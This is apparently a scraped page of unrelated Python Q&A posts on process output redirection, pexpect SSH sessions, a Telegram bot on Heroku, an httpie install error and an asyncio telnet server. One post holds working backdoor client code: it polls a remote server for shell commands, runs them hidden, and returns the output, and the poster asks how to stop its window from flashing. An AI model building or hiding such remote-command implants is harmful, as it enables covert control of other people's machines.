Redirect multiprocessing.Process output properly - windows

I want to spawn a process and redirect its stdout/stderr.
With subprocess.Popen this example seems to work properly but not with multiprocessing.Process.
main script:
from multiprocessing import Process, set_start_method
import subprocess
import os
os.chdir(os.path.dirname(__file__))
def sub():
import sys
sys.stdout = None
sys.stderr = None
sys.__stdout__ = None
sys.__stderr__ = None
subprocess.run(["tasklist"])
print("Test") # is not printed. OK!
if __name__ == "__main__":
set_start_method("spawn")
## multiprocessing.Process: tasklist output IS printed on console and is not redirected via sys.stdout. Why?
p = Process(target=sub)
p.start()
p.join()
## subprocess.Popen: tasklist output is printed to the file
fh = open("out", "w")
p2 = subprocess.Popen("python popen.py",
stdout=fh)
fh.close()
Content of popen.py:
import subprocess
if __name__ == "__main__":
subprocess.run(["tasklist"])

Related

issue about pexpect logfile_read

use pexpect SSH connections to run cmds on remote server, the command can be executed, but the results displayed on the terminal are not as expected, code like this(At first there was no time.sleep, it was added for debugging)
import logging
import time
from pexpectUtility import Session
logger = logging.getLogger(__name__)
def test_create_and_show():
cliPrompt = 'dev-r0'
hostPrompt = 'admin#dev-r0'
aa = Session()
aa.connect("admin","password", "10.10.0.10")
time.sleep(2)
aa.child.sendline("sonic-cli")
aa.child.expect(cliPrompt, 3)
tTime = 0
time.sleep(tTime)
aa.child.sendline("configure terminal")
aa.child.expect(cliPrompt, 3)
time.sleep(tTime)
aa.child.sendline("end")
aa.child.expect(cliPrompt, 3)
time.sleep(tTime)
aa.child.sendline("exit")
aa.child.expect(hostPrompt, 3)
aa.disconnect()
the pexpectUtility.py
import sys
import logging as log
if sys.platform == 'win32':
import WExpect as pexpect
spawn_class = pexpect.spawn_windows
else:
import pexpect
spawn_class = pexpect.spawn
class MutliIO:
def __init__(self, *fds):
self.fds = fds
def write(self, data):
for fd in self.fds:
fd.write(data)
def flush(self):
for fd in self.fds:
fd.flush()
class Session(spawn_class):
def __init__(self):
self.child = None
def connect(self, username, password, serverIp, protocol='ssh'):
self.protocol = protocol
self.username = username
self.password = password
self.serverIp = serverIp
if protocol == 'ssh':
cmd = "ssh -x -o StrictHostKeyChecking=no -l %s " % self.username
else:
cmd = "telnet "
cmd = cmd + serverIp
log.info('Connecting to Dut: %s\n' %(cmd))
expect_list = ['ogin: $', '[P|p]assword:', '\[confirm\] $',
'\[confirm yes/no\]:', '\[yes/no\]:', '\(yes/no\)\?',
'\[y/n\]:', '--More--', 'ONIE:/ #',
pexpect.TIMEOUT, pexpect.EOF]
self.child = spawn_class(cmd)
logfile = open('pexpect.log', 'w')
self.child.logfile_read = MutliIO(sys.stdout)
# self.child.logfile_read = MutliIO(sys.stdout, logfile)
# self.child.logfile_read = MutliIO(logfile)
try:
re = self.child.expect(expect_list, 10)
log.debug("expect pwd: {}".format(re))
except Exception as err:
log.error('%s' %err)
raise
# login
try:
self.child.sendline(self.password)
except Exception as err:
raise RuntimeError("login failed!", err)
def disconnect(self):
self.child.sendline("exit")
self.child.expect(pexpect.EOF)
self.child.close()
if self.child.logfile_read != None:
self.child.logfile_read = None
Executed commands are repeated displayed, just like batch input. log is as follows:
admin#dev-r0:~$ sonic-cli
configure terminal
configure terminal
end
exit
dev-r0# configure terminal
dev-r0(config)# end
dev-r0# exit
admin#dev-r0:~$ exit
logout
Connection to 10.10.0.10 closed.
When I set tTime to 5 (each command interval is 5 seconds) the log is as expected,I think this is not a good solution,I also want to know the root cause
admin#dev-r0:~$ sonic-cli
dev-r0# configure terminal
dev-r0(config)# end
dev-r0# exit
admin#dev-r0:~$ exit
logout
Connection to 10.10.0.10 closed.
When I directly use expect to implement the above operation, there is no need to wait for 5 seconds between commands, and the log displayed by the terminal is normal.
why pexpect has this issue? how to solve this? Thanks in advance
This is not the whole answer, but a first point to fix. After the
sendline("sonic-cli") the first expect() is going to return
immediately, as it will match the prompt admin#dev-r0:~$ which is already
there waiting, before the sonic-cli command arrives. This means the next
command configure terminal is sent immediately after sonic-cli.
You should enhance the connect() routine to expect the admin#dev-r0:~$
prompt before returning, or use this expect instead of the sleep(2) which
should not be necessary.
Referring to the sample code of pexpect on the Internet, I found that the root cause is a code problem: missing a expect() after sendline()
The changes are as follows:
# login
try:
self.child.sendline(self.password)
HOST_PROMPT = '\$' # remote server prompt
re = self.child.expect(HOST_PROMPT)
except Exception as err:
raise RuntimeError("login failed!", err)

python program packed by Pyinstaller shows blinking window on windows

I am trying to write a back door program with python.
I design the program with client-server architecture.
Here is the code of client.
from subprocess import PIPE, Popen, CREATE_NO_WINDOW
from typing import List, Optional
from datetime import datetime
from time import sleep
from threading import Thread
from socket import socket, AF_INET, SOCK_DGRAM
from getmac import get_mac_address as gma
import json
import requests
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
SERVER_PORT = 8080
SERVER_ADDRESS = 'https://example.com:' + str(SERVER_PORT)
def get_ip() -> str:
s = socket(AF_INET, SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
ip = s.getsockname()[0]
s.close()
return ip
def get_mac() -> str:
return gma().replace(':', '')
def announce() -> List[str]:
requests.post(f'{SERVER_ADDRESS}/announce/{get_id()}', verify=False)
def get_id() -> str:
return get_ip() + '_' + get_mac()
def get_command() -> Optional[List[str]]:
try:
r = requests.get(f'{SERVER_ADDRESS}/command/{get_id()}', verify=False)
except requests.exceptions.ConnectionError:
print('Connection to server error.')
return None
if r.status_code == 200:
r = json.loads(r.text)
status = int(r['status'])
if status == 1:
print(f'Get a command from server.')
return r['command']
else:
return None
else:
print(f'Server returned status code {r.status_code}.')
print(f'Here is the response from server:\n{r.text}')
print()
def run_command():
while True:
command = get_command()
if command is not None:
p = Popen(command, shell=True, stdout=PIPE, stderr=PIPE, creationflags=CREATE_NO_WINDOW)
stdout, stderr = p.communicate()
data = {
'command': command,
'result': stdout.decode() + stderr.decode(),
'timestamp': datetime.now().strftime('%Y.%m.%d %H:%M:%S'),
}
requests.post(f'{SERVER_ADDRESS}/result/{get_id()}', json=data, verify=False)
sleep(5)
announce()
Thread(target=run_command).start()
The program runs well and I pack the python file to exe file with PyInstaller with the following command on windows.
pyinstaller -F -w program.py
-F for one-file
-w for window hidding
The packed program(exe file) runs well, but a windows terminal window shows with about 1Hz frequency. The behavior is strange and I need help.
The blinking window is NOT caused by subprocess because the window keep blinking even if I don't give any command to client.
I have googled the problem for a short time, but there is nothing helpful. I don't know the reason why the window keep blinking, and I think that is the point to explain why I just find nothing.

My application on the heroku server stops after running for 1 minute (PYTHON)

My application on the heroku server stops after running for 1 minute. Then it runs and hears commands sent to itself whenever it wants. I was wondering if it could be from the 30-minute limit, but it never worked that long.
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters
import commands as c
TOKEN = "--------------"
def main():
updater = Updater(TOKEN, use_context=True)
dp = updater.dispatcher
#my commands
dp.add_handler(CommandHandler("start", c.start_command))
#while I write unknown word that the bot doesnt know
dp.add_handler(MessageHandler(Filters.text, c.wrong_command))
updater.start_polling()
updater.idle()
if __name__ == "__main__":
main()
#commands.py
from telegram.ext import Updater
def start_command(update, context):
message = "hi!"
return update.message.reply_text(message)
def wrong_command(update, context):
message = "/start only"
return update.message.reply_text(message)
requirements.txt
"""
python-telegram-bot
Procfile
web: python main.py
""" There are not many codes in the "signs".

http command : SyntaxError: invalid syntax on file core.py

I am trying to install and run http command in my Ubuntu 18.04.4 LTS.
I think I have successfully installed the http. But when I am going to check the version of http by http --version or trying to connect to a website, say http github.org I am getting the following:
Traceback (most recent call last):
File "/usr/local/bin/http", line 8, in <module>
sys.exit(main())
File "/usr/local/lib/python2.7/dist-packages/httpie/__main__.py", line 10, in main
from .core import main
File "/usr/local/lib/python2.7/dist-packages/httpie/core.py", line 21
args: List[Union[str, bytes]] = sys.argv,
^
SyntaxError: invalid syntax
Here is how my main.py looks like:
#!/usr/bin/env python
"""The main entry point. Invoke as `http' or `python -m httpie'.
"""
import sys
def main():
try:
from .core import main
exit_status = main()
except KeyboardInterrupt:
from httpie.status import ExitStatus
exit_status = ExitStatus.ERROR_CTRL_C
sys.exit(exit_status.value)
if __name__ == '__main__':
main()
And core.py in python 2.7
import argparse
import os
import platform
import sys
from typing import List, Union
import requests
from pygments import __version__ as pygments_version
from requests import __version__ as requests_version
from httpie import __version__ as httpie_version
from httpie.client import collect_messages
from httpie.context import Environment
from httpie.downloads import Downloader
from httpie.output.writer import write_message, write_stream
from httpie.plugins import plugin_manager
from httpie.status import ExitStatus, http_status_to_exit_status
def main(
args: List[Union[str, bytes]] = sys.argv,
env=Environment(),
) -> ExitStatus:
"""
The main function.
Pre-process args, handle some special types of invocations,
and run the main program with error handling.
Return exit status code.
"""
program_name, *args = args
env.program_name = os.path.basename(program_name)
args = decode_raw_args(args, env.stdin_encoding)
plugin_manager.load_installed_plugins()
from httpie.cli.definition import parser
if env.config.default_options:
args = env.config.default_options + args
include_debug_info = '--debug' in args
include_traceback = include_debug_info or '--traceback' in args
if include_debug_info:
print_debug_info(env)
if args == ['--debug']:
return ExitStatus.SUCCESS
exit_status = ExitStatus.SUCCESS
try:
parsed_args = parser.parse_args(
args=args,
env=env,
)
except KeyboardInterrupt:
env.stderr.write('\n')
if include_traceback:
raise
exit_status = ExitStatus.ERROR_CTRL_C
except SystemExit as e:
if e.code != ExitStatus.SUCCESS:
env.stderr.write('\n')
if include_traceback:
raise
exit_status = ExitStatus.ERROR
else:
try:
exit_status = program(
args=parsed_args,
env=env,
)
except KeyboardInterrupt:
env.stderr.write('\n')
if include_traceback:
raise
exit_status = ExitStatus.ERROR_CTRL_C
except SystemExit as e:
if e.code != ExitStatus.SUCCESS:
env.stderr.write('\n')
if include_traceback:
raise
exit_status = ExitStatus.ERROR
except requests.Timeout:
exit_status = ExitStatus.ERROR_TIMEOUT
env.log_error(f'Request timed out ({parsed_args.timeout}s).')
except requests.TooManyRedirects:
exit_status = ExitStatus.ERROR_TOO_MANY_REDIRECTS
env.log_error(
f'Too many redirects'
f' (--max-redirects=parsed_args.max_redirects).'
)
except Exception as e:
# TODO: Further distinction between expected and unexpected errors.
msg = str(e)
if hasattr(e, 'request'):
request = e.request
if hasattr(request, 'url'):
msg = (
f'{msg} while doing a {request.method}'
f' request to URL: {request.url}'
)
env.log_error(f'{type(e).__name__}: {msg}')
if include_traceback:
raise
exit_status = ExitStatus.ERROR
return exit_status
def program(
args: argparse.Namespace,
env: Environment,
) -> ExitStatus:
"""
The main program without error handling.
"""
exit_status = ExitStatus.SUCCESS
downloader = None
try:
if args.download:
args.follow = True # --download implies --follow.
downloader = Downloader(
output_file=args.output_file,
progress_file=env.stderr,
resume=args.download_resume
)
downloader.pre_request(args.headers)
initial_request = None
final_response = None
for message in collect_messages(args, env.config.directory):
write_message(
requests_message=message,
env=env,
args=args,
)
if isinstance(message, requests.PreparedRequest):
if not initial_request:
initial_request = message
else:
final_response = message
if args.check_status or downloader:
exit_status = http_status_to_exit_status(
http_status=message.status_code,
follow=args.follow
)
if (not env.stdout_isatty
and exit_status != ExitStatus.SUCCESS):
env.log_error(
f'HTTP {message.raw.status} {message.raw.reason}',
level='warning'
)
if downloader and exit_status == ExitStatus.SUCCESS:
# Last response body download.
download_stream, download_to = downloader.start(
initial_url=initial_request.url,
final_response=final_response,
)
write_stream(
stream=download_stream,
outfile=download_to,
flush=False,
)
downloader.finish()
if downloader.interrupted:
exit_status = ExitStatus.ERROR
env.log_error(
'Incomplete download: size=%d; downloaded=%d' % (
downloader.status.total_size,
downloader.status.downloaded
))
return exit_status
finally:
if downloader and not downloader.finished:
downloader.failed()
if (not isinstance(args, list) and args.output_file
and args.output_file_specified):
args.output_file.close()
def print_debug_info(env: Environment):
env.stderr.writelines([
f'HTTPie {httpie_version}\n',
f'Requests {requests_version}\n',
f'Pygments {pygments_version}\n',
f'Python {sys.version}\n{sys.executable}\n',
f'{platform.system()} {platform.release()}',
])
env.stderr.write('\n\n')
env.stderr.write(repr(env))
env.stderr.write('\n')
def decode_raw_args(
args: List[Union[str, bytes]],
stdin_encoding: str
) -> List[str]:
"""
Convert all bytes args to str
by decoding them using stdin encoding.
"""
return [
arg.decode(stdin_encoding)
if type(arg) == bytes else arg
for arg in args
]
I have two versions of python are installed in my system. As I understood python2.7 came as pre-installed and I have installed python 3.
Currently the default python version is python 3.
What could cause the error? Is it with my different python version or syntax error?

how to await two tasks in a coroutine?

i am study asyncio on python3.7.5 and i had choosed implement a telentd as the task
now after some coding, i found its almost done, except one weird things , code below
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import asyncio
import os
import pty
import sys
import termios
from subprocess import Popen
async def copyto(src, dst):
while True:
if getattr(src, 'read', None):
# print(f"src has read")
buf = await src.read(1024)
else:
# print(f"src dont have read")
buf = os.read(src, 1024)
if getattr(dst, 'write', None):
# print(f"dst has write")
dst.write(buf)
await dst.drain()
else:
# print(f"dst dont has write")
os.write(dst, buf)
async def handlerCommand(reader, writer):
# command = 'podman run -it --rm alpine bash'
command = 'bash'
oldTty = termios.tcgetattr(sys.stdin)
# open pseudo-terminal to interact with subprocess
masterFd, slaveFd = pty.openpty()
# force remote side into character mode
writer.write(b"\xff\xfd\x22\xff\xfb\x01")
# use os.setsid() make it run in a new process group, or bash job control will not be enabled
Popen(
command,
preexec_fn=os.setsid,
stdin=slaveFd,
stdout=slaveFd,
stderr=slaveFd,
universal_newlines=True)
os.write(masterFd, b"ls\n")
await asyncio.gather(
copyto(masterFd, writer),
copyto(reader, masterFd)
)
# restore tty settings back
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, oldTty)
async def main(host, port):
server = await asyncio.start_server(
handlerCommand,
host,
port
)
addr = server.sockets[0].getsockname()
print(f'Serving on {addr}')
async with server:
await server.serve_forever()
if __name__ == "__main__":
asyncio.run(main('127.0.0.1', 8888))
this is a full runable code, and as you can see, when user connected, i will start a bash process and connect it to user's socket. but now my problem is user could saw output from the process, while cant send any keystroke to the process.
i thought it might be that my understanding of asyncio's gather. but i am not sure
on the client side i just use
telnet 127.0.0.1 8888
a factored version of the server below, those term stuff still not solved
but on asyncio level, i think the problem solved despite the solution is too heavy
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
a telnet server sample
"""
import asyncio
import os
import pty
import tty
from subprocess import Popen
import concurrent.futures
import telnetlib3
async def sock2f(sock, fobj):
"""
copy from socket to fobj
"""
while True:
buf = await sock.read(1)
if not buf:
print(f"sock2f break")
break
print(f"sock2fd {buf}")
fobj.write(buf)
fobj.flush()
async def f2sock(fobj, sock):
"""
copy from fobj to sock
"""
print(f"f2sock 开始")
def _block_read(length):
return fobj.read(length)
loop = asyncio.get_running_loop()
with concurrent.futures.ThreadPoolExecutor() as pool:
while True:
print(f"f2sock readbuf")
buf = await loop.run_in_executor(pool, _block_read, 32)
print(f"f2sock readbuf done")
if not buf:
print(f"f2sock break")
break
print(f"f2sock {buf}")
sock.write(buf)
await sock.drain()
async def handlerCommand(reader, writer):
"""
ha
"""
# command = 'podman run -it --rm alpine bash'
command = 'bash'
# open pseudo-terminal to interact with subprocess
masterFd, slaveFd = pty.openpty()
tty.setraw(slaveFd)
tty.setraw(masterFd)
Popen(
command,
bufsize=0,
preexec_fn=os.setsid,
stdin=slaveFd,
stdout=slaveFd,
stderr=slaveFd,
universal_newlines=True,
# close_fds=True,
shell=True
)
os.write(masterFd, b"ls\n")
m_read = os.fdopen(masterFd, 'rb')
m_write = os.fdopen(masterFd, 'wb')
await asyncio.gather(
f2sock(m_read, writer),
sock2f(reader, m_write),
)
loop = asyncio.get_event_loop()
coro = telnetlib3.create_server(
port=6023,
term="xterm-256color",
encoding=False,
shell=handlerCommand
)
server = loop.run_until_complete(coro)
loop.run_until_complete(server.wait_closed())

Resources